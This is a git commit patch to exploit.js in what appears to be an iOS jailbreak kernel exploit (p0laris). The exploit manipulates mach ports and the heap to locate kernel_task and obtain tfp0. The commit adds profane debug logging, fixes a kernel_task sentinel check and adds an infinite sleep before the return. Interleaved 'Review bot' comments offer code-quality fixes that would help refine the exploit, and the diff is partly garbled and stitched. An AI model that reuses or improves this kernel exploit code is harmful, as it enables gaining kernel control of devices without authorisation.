From b88cb06e11df31cb7f079d2c78c42b7fced7bb17 Mon Sep 17 00:00:00 2001
From: spv420
Date: Sun, 31 Jul 2022 04:30:23 -0400
Subject: fucking retard
---
 src/stage4/kexp/exploit.js | 17 +++++++++++++++--
 1 file changed, 15 insertions(+), 2 deletions(-)
(limited to 'src/stage4/kexp')
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index aa10126..19d2623 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -289,13 +289,19 @@ function send_ports(target, payload, num, number_port_descs) {
 function release_port_ptrs(port) {
 // var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
+ p0laris_log("fuck");
 var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
-// p0laris_log("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
+ p0laris_log("fuck");
+ // p0laris_log("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
 var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+ p0laris_log("fuck");
 if (ret != KERN_SUCCESS) {
 p0laris_log("mach_recv %d %s\n", ret, mach_error_string(ret));
+ p0laris_log("fuck2");
 }
+ p0laris_log("fuck");
 shit_heap_free(req);
+ p0laris_log("fuck");
 }
 function r3gister(task, init_port_set, real_count, fake_count) {
@@ -463,6 +469,9 @@ again: while (true) {
 sched_yield();
 for (var i = 0; i < PORTS_NUM; i++) {
 // for (var i = 0; i < 8; i++) {
+ if (i % 4 == 0) {
+ p0laris_log("release_port_ptrs %d\n", i);
+ }
 release_port_ptrs(read_u32(fp + (i << 2)));
 }
@@ -544,7 +553,7 @@ again: while (true) {
 p0laris_log("IF YOU SEE THIS AND IT LOOKS LEGIT, SHIT HAS FUCKING HAPPENED\n");
 p0laris_log("fuck\n");
 call4arg(sym_cache["puts"], sptr("kernel_task address: 0x" + pad_left(read_u32(kernel_task_addr).toString(16), '0', 8)), 0, 0, 0);
-if (kernel_task_addr === 0xffffffff) {
+if (read_u32(kernel_task_addr) === 0xffffffff) {
 continue again;
 }
 p0laris_log("kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
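Review bot: The five trace calls added to release_port_ptrs all emit the identical string "fuck", so when the output stops it is impossible to tell which step of the function was the last one reached; give each a distinct message naming the step, for example `p0laris_log("release_port_ptrs: after shit_heap\n");` before the mach_msg call and `p0laris_log("release_port_ptrs: mach_msg ret=%d\n", ret);` after it. The new messages also omit the trailing `\n` that every other p0laris_log call visible in this patch carries, so they will run together with whatever is printed next. If this is temporary instrumentation, a marker such as `// TEMP: tracing, remove before merge` above the first call would make that intent clear to the next reader.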
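Review bot: The new progress check in the release loop uses loose equality, `if (i % 4 == 0) {`, while the comparison this same commit touches two hunks later uses `===`; write `if (i % 4 === 0) {` so the file is consistent and no coercion is involved. The `4` is a magic number whose purpose is not stated; a short comment such as `// log every 4th port to keep the trace readable — presumably, confirm` would help, since the reason is not visible here. The enclosing `again: while (true)` loop starts and ends outside the hunk.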
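Review bot: With the fix, `read_u32(kernel_task_addr)` is evaluated three times in four consecutive lines (the puts call, the sentinel check and the final log), so the value that is checked is not necessarily the value that was printed if the read result can differ between calls; read it once before the call4arg line, `var kt_addr = read_u32(kernel_task_addr);`, and use `kt_addr` in all three places. That also makes the actual fix — comparing the read value rather than the address itself — visible at the comparison site. The check only rejects 0xffffffff; whether a failed read can also yield 0 or another sentinel is not visible in this hunk and may be worth covering. The enclosing `again: while (true)` loop starts and ends outside the hunk.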
@@ -552,6 +561,10 @@ again: while (true) { p0laris_log("get lucky\n"); + while (true) { + sleep(3600); + } + return tfp0; } } -- cgit v1.2.3
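Review bot: The added `while (true) { sleep(3600); }` sits directly before `return tfp0;`, so the return is now unreachable, any caller waiting on this function's result never gets it, and the `again` loop never exits normally. If this is a deliberate hold for debugging, say so on the loop, e.g. `// DEBUG: park here indefinitely; the return below is dead code until this is removed`, so it is not mistaken for intended behaviour or left in by accident. The enclosing function starts outside the hunk.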